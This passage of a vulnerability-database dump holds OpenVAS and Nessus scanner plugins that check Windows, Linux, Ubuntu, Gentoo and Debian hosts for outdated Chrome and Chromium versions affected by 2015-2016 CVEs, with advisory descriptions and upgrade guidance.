"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:13:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-6583", "CVE-2015-1297", "CVE-2015-6580", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-6582", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-6581", "CVE-2015-1292", "CVE-2015-1299"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-09-07T00:00:00", "id": "OPENVAS:1361412562310806039", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806039", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-01 September15 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities-01 September15 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806039\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-6583\", \"CVE-2015-6582\", \"CVE-2015-6581\", \"CVE-2015-6580\",\n \"CVE-2015-1301\", \"CVE-2015-1300\", \"CVE-2015-1299\", \"CVE-2015-1298\",\n \"CVE-2015-1297\", \"CVE-2015-1296\", \"CVE-2015-1295\", \"CVE-2015-1294\",\n \"CVE-2015-1293\", \"CVE-2015-1292\", \"CVE-2015-1291\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-09-07 12:19:25 +0530 (Mon, 07 Sep 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-01 September15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Use-after-free vulnerability in the shared-timer implementation in Blink.\n\n - Double free vulnerability in OpenJPEG before r3002, as used in PDFium.\n\n - Multiple vulnerabilities in Blink.\n\n - Improper validation of user supplied input for setUninstallURL preference.\n\n - Improper handling of requests by WebRequest API implementation.\n\n - Error in UnescapeURLWithAdjustmentsImpl implementation.\n\n - Multiple use-after-free vulnerabilities in the PrintWebViewHelper class.\n\n - Use-after-free vulnerability in the 'SkMatrix::invertNonIdentity' function\n in core/SkMatrix.cpp script in Skia.\n\n - Multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass security restrictions, cause a denial of service condition\n or potentially execute arbitrary code, conduct spoofing attack, gain sensitive\n information, trigger specific actions and other unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 45.0.2454.85 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 45.0.2454.85 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/09/stable-channel-update.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"45.0.2454.85\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 45.0.2454.85' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:12:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-6583", "CVE-2015-1297", "CVE-2015-6580", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-6582", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-6581", "CVE-2015-1292", "CVE-2015-1299"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-09-07T00:00:00", "id": "OPENVAS:1361412562310806041", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806041", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-01 September15 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities-01 September15 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806041\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-6583\", \"CVE-2015-6582\", \"CVE-2015-6581\", \"CVE-2015-6580\",\n \"CVE-2015-1301\", \"CVE-2015-1300\", \"CVE-2015-1299\", \"CVE-2015-1298\",\n \"CVE-2015-1297\", \"CVE-2015-1296\", \"CVE-2015-1295\", \"CVE-2015-1294\",\n \"CVE-2015-1293\", \"CVE-2015-1292\", \"CVE-2015-1291\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-09-07 13:00:04 +0530 (Mon, 07 Sep 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-01 September15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Use-after-free vulnerability in the shared-timer implementation in Blink.\n\n - Double free vulnerability in OpenJPEG before r3002, as used in PDFium.\n\n - Multiple vulnerabilities in Blink.\n\n - Improper validation of user supplied input for setUninstallURL preference.\n\n - Improper handling of requests by WebRequest API implementation.\n\n - Error in UnescapeURLWithAdjustmentsImpl implementation.\n\n - Multiple use-after-free vulnerabilities in the PrintWebViewHelper class.\n\n - Use-after-free vulnerability in the 'SkMatrix::invertNonIdentity' function\n in core/SkMatrix.cpp script in Skia.\n\n - Multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass security restrictions, cause a denial of service condition\n or potentially execute arbitrary code, conduct spoofing attack, gain sensitive\n information, trigger specific actions and other unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 45.0.2454.85 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 45.0.2454.85 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/09/stable-channel-update.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"45.0.2454.85\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 45.0.2454.85' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1332", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2015-09-09T00:00:00", "id": "OPENVAS:1361412562310842433", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842433", "type": "openvas", "title": "Ubuntu Update for oxide-qt USN-2735-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for oxide-qt USN-2735-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842433\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-09 06:28:07 +0200 (Wed, 09 Sep 2015)\");\n script_cve_id(\"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1293\", \"CVE-2015-1294\",\n \"CVE-2015-1299\", \"CVE-2015-1300\", \"CVE-2015-1301\", \"CVE-2015-1332\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for oxide-qt USN-2735-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the DOM tree could be\ncorrupted during parsing in some circumstances. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit this to\nbypass same-origin restrictions or cause a denial of service. (CVE-2015-1291)\n\nAn issue was discovered in NavigatorServiceWorker::serviceWorker in Blink.\nIf a user were tricked in to opening a specially crafted website, an\nattacker could potentially exploit this to bypass same-origin\nrestrictions. (CVE-2015-1292)\n\nAn issue was discovered in the DOM implementation in Blink. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to bypass same-origin restrictions.\n(CVE-2015-1293)\n\nA use-after-free was discovered in Skia. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via renderer crash, or execute arbitrary\ncode with the privileges of the sandboxed render process. (CVE-2015-1294)\n\nA use-after-free was discovered in the shared-timer implementation in\nBlink. If a user were tricked in to opening a specially crafted website,\nan attacker could potentially exploit this to cause a denial of service\nvia renderer crash, or execute arbitrary code with the privileges of the\nsandboxed render process. (CVE-2015-1299)\n\nIt was discovered that the availability of iframe Resource Timing API\ntimes was not properly restricted in some circumstances. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to obtain sensitive information. (CVE-2015-1300)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1301)\n\nA heap corruption issue was discovered in oxide::JavaScriptDialogManager.\nIf a user were tricked in to opening a specially crafted website, an\nattacker could potentially exploit this to cause a denial of service via\napplication crash, or execute arbitrary code with the privileges of the\nuser invoking the program. (CVE-2015-1332)\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2735-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2735-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.9.1-0ubuntu0.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.9.1-0ubuntu0.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-6776", "CVE-2016-1628", "CVE-2016-1634", "CVE-2015-6775", "CVE-2016-1638", "CVE-2015-6789", "CVE-2015-6766", "CVE-2015-6762", "CVE-2015-8126", "CVE-2015-1288", "CVE-2015-1281", "CVE-2015-6764", "CVE-2016-1612", "CVE-2015-6770", "CVE-2015-6760", "CVE-2015-6781", "CVE-2015-1291", "CVE-2016-1615", "CVE-2015-1275", "CVE-2016-1626", "CVE-2016-1618", "CVE-2015-1297", "CVE-2015-1286", "CVE-2016-1613", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-6771", "CVE-2015-1289", "CVE-2015-1296", "CVE-2015-1270", "CVE-2015-6784", "CVE-2015-1272", "CVE-2015-1283", "CVE-2015-1279", "CVE-2015-1274", "CVE-2015-1300", "CVE-2015-1287", "CVE-2016-1621", "CVE-2016-1631", "CVE-2015-6774", "CVE-2015-6778", "CVE-2016-1640", "CVE-2016-1632", "CVE-2015-1282", "CVE-2016-1622", "CVE-2015-6772", "CVE-2015-1285", "CVE-2016-1639", "CVE-2016-1616", "CVE-2015-1302", "CVE-2015-1293", "CVE-2015-6758", "CVE-2015-1303", "CVE-2015-1294", "CVE-2016-1635", "CVE-2015-1276", "CVE-2015-1278", "CVE-2016-1620", "CVE-2015-6767", "CVE-2015-6783", "CVE-2016-1636", "CVE-2015-6787", "CVE-2015-6792", "CVE-2015-1277", "CVE-2016-1627", "CVE-2015-6786", "CVE-2016-1641", "CVE-2016-1633", "CVE-2016-1624", "CVE-2016-1617", "CVE-2015-6791", "CVE-2016-1629", "CVE-2015-6780", "CVE-2015-6785", "CVE-2015-6790", "CVE-2016-1619", "CVE-2015-1271", "CVE-2015-1292", "CVE-2015-6779", "CVE-2015-6788", "CVE-2015-6759", "CVE-2015-1273", "CVE-2015-6756", "CVE-2015-6768", "CVE-2015-6763", "CVE-2016-1630", "CVE-2016-1637", "CVE-2015-6765", "CVE-2015-6755", "CVE-2015-6769", "CVE-2015-6773", "CVE-2015-1304", "CVE-2015-6777", "CVE-2015-1280", "CVE-2015-1299", "CVE-2015-6757", "CVE-2016-1623", "CVE-2015-6782", "CVE-2016-1625", "CVE-2015-1284", "CVE-2016-1614", "CVE-2015-6761"], "description": "Gentoo Linux Local Security Checks", "modified": "2018-10-12T00:00:00", "published": "2016-03-14T00:00:00", "id": "OPENVAS:1361412562310121451", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121451", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201603-09", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201603-09.nasl 11856 2018-10-12 07:45:29Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.fi>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121451\");\n script_version(\"$Revision: 11856 $\");\n script_tag(name:\"creation_date\", value:\"2016-03-14 15:52:45 +0200 (Mon, 14 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 09:45:29 +0200 (Fri, 12 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201603-09\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in the Chromium web browser. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201603-09\");\n script_cve_id(\"CVE-2015-1270\", \"CVE-2015-1271\", \"CVE-2015-1272\", \"CVE-2015-1273\", \"CVE-2015-1274\", \"CVE-2015-1275\", \"CVE-2015-1276\", \"CVE-2015-1277\", \"CVE-2015-1278\", \"CVE-2015-1279\", \"CVE-2015-1280\", \"CVE-2015-1281\", \"CVE-2015-1282\", \"CVE-2015-1283\", \"CVE-2015-1284\", \"CVE-2015-1285\", \"CVE-2015-1286\", \"CVE-2015-1287\", \"CVE-2015-1288\", \"CVE-2015-1289\", \"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1293\", \"CVE-2015-1294\", \"CVE-2015-1295\", \"CVE-2015-1296\", \"CVE-2015-1297\", \"CVE-2015-1298\", \"CVE-2015-1299\", \"CVE-2015-1300\", \"CVE-2015-1302\", \"CVE-2015-1303\", \"CVE-2015-1304\", \"CVE-2015-6755\", \"CVE-2015-6756\", \"CVE-2015-6757\", \"CVE-2015-6758\", \"CVE-2015-6759\", \"CVE-2015-6760\", \"CVE-2015-6761\", \"CVE-2015-6762\", \"CVE-2015-6763\", \"CVE-2015-6764\", \"CVE-2015-6765\", \"CVE-2015-6766\", \"CVE-2015-6767\", \"CVE-2015-6768\", \"CVE-2015-6769\", \"CVE-2015-6770\", \"CVE-2015-6771\", \"CVE-2015-6772\", \"CVE-2015-6773\", \"CVE-2015-6774\", \"CVE-2015-6775\", \"CVE-2015-6776\", \"CVE-2015-6777\", \"CVE-2015-6778\", \"CVE-2015-6779\", \"CVE-2015-6780\", \"CVE-2015-6781\", \"CVE-2015-6782\", \"CVE-2015-6783\", \"CVE-2015-6784\", \"CVE-2015-6785\", \"CVE-2015-6786\", \"CVE-2015-6787\", \"CVE-2015-6788\", \"CVE-2015-6789\", \"CVE-2015-6790\", \"CVE-2015-6791\", \"CVE-2015-6792\", \"CVE-2015-8126\", \"CVE-2016-1612\", \"CVE-2016-1613\", \"CVE-2016-1614\", \"CVE-2016-1615\", \"CVE-2016-1616\", \"CVE-2016-1617\", \"CVE-2016-1618\", \"CVE-2016-1619\", \"CVE-2016-1620\", \"CVE-2016-1621\", \"CVE-2016-1622\", \"CVE-2016-1623\", \"CVE-2016-1624\", \"CVE-2016-1625\", \"CVE-2016-1626\", \"CVE-2016-1627\", \"CVE-2016-1628\", \"CVE-2016-1629\", \"CVE-2016-1630\", \"CVE-2016-1631\", \"CVE-2016-1632\", \"CVE-2016-1633\", \"CVE-2016-1634\", \"CVE-2016-1635\", \"CVE-2016-1636\", \"CVE-2016-1637\", \"CVE-2016-1638\", \"CVE-2016-1639\", \"CVE-2016-1640\", \"CVE-2016-1641\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-client/chromium\", unaffected: make_list(\"ge 49.0.2623.87\"), vulnerable: make_list(\"lt 49.0.2623.87\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T09:49:14", "description": "Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2015-1291\n A cross-origin bypass issue was discovered in DOM.\n\n - CVE-2015-1292\n Mariusz Mlynski discovered a cross-origin bypass issue\n in ServiceWorker.\n\n - CVE-2015-1293\n Mariusz Mlynski discovered a cross-origin bypass issue\n in DOM.\n\n - CVE-2015-1294\n cloudfuzzer discovered a use-after-free issue in the\n Skia graphics library.\n\n - CVE-2015-1295\n A use-after-free issue was discovered in the printing\n component.\n\n - CVE-2015-1296\n zcorpan discovered a character spoofing issue.\n\n - CVE-2015-1297\n Alexander Kashev discovered a permission scoping error.\n\n - CVE-2015-1298\n Rob Wu discovered an error validating the URL of\n extensions.\n\n - CVE-2015-1299\n taro.suzuki.dev discovered a use-after-free issue in the\n Blink/WebKit library.\n\n - CVE-2015-1300\n cgvwzq discovered an information disclosure issue in the\n Blink/WebKit library.\n\n - CVE-2015-1301\n The chrome 45 development team found and fixed various\n issues during internal auditing. Also multiple issues\n were fixed in the libv8 library, version 4.5.103.29.", "edition": 22, "published": "2015-09-04T00:00:00", "title": "Debian DSA-3351-1 : chromium-browser - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "modified": "2015-09-04T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:chromium-browser"], "id": "DEBIAN_DSA-3351.NASL", "href": "https://www.tenable.com/plugins/nessus/85770", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3351. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85770);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1293\", \"CVE-2015-1294\", \"CVE-2015-1295\", \"CVE-2015-1296\", \"CVE-2015-1297\", \"CVE-2015-1298\", \"CVE-2015-1299\", \"CVE-2015-1300\", \"CVE-2015-1301\");\n script_xref(name:\"DSA\", value:\"3351\");\n\n script_name(english:\"Debian DSA-3351-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2015-1291\n A cross-origin bypass issue was discovered in DOM.\n\n - CVE-2015-1292\n Mariusz Mlynski discovered a cross-origin bypass issue\n in ServiceWorker.\n\n - CVE-2015-1293\n Mariusz Mlynski discovered a cross-origin bypass issue\n in DOM.\n\n - CVE-2015-1294\n cloudfuzzer discovered a use-after-free issue in the\n Skia graphics library.\n\n - CVE-2015-1295\n A use-after-free issue was discovered in the printing\n component.\n\n - CVE-2015-1296\n zcorpan discovered a character spoofing issue.\n\n - CVE-2015-1297\n Alexander Kashev discovered a permission scoping error.\n\n - CVE-2015-1298\n Rob Wu discovered an error validating the URL of\n extensions.\n\n - CVE-2015-1299\n taro.suzuki.dev discovered a use-after-free issue in the\n Blink/WebKit library.\n\n - CVE-2015-1300\n cgvwzq discovered an information disclosure issue in the\n Blink/WebKit library.\n\n - CVE-2015-1301\n The chrome 45 development team found and fixed various\n issues during internal auditing. Also multiple issues\n were fixed in the libv8 library, version 4.5.103.29.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1293\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1295\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1297\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1298\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1300\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1301\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3351\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 45.0.2454.85-1~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 